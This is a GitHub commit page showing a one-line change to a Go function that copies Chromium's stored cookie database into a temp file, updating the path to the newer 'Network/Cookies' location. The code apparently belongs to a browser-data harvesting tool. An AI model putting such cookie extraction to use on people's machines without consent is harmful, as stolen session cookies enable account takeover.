Skip to content

Commit

Permalink
Update cookies.go
Browse files Browse the repository at this point in the history
  • Loading branch information
hackirby authored Nov 25, 2023
1 parent 19a1499 commit cf71b74
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion modules/browsers/cookies.go
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@ import (

func (c *Chromium) GetCookies(path string) (cookies []Cookie, err error) {
tempPath := filepath.Join(os.TempDir(), "cookie_db")
err = fileutil.CopyFile(filepath.Join(path, "Cookies"), tempPath)
err = fileutil.CopyFile(filepath.Join(path, "Network", "Cookies"), tempPath)
if err != nil {
return nil, err
}
Expand Down

0 comments on commit cf71b74

Please sign in to comment.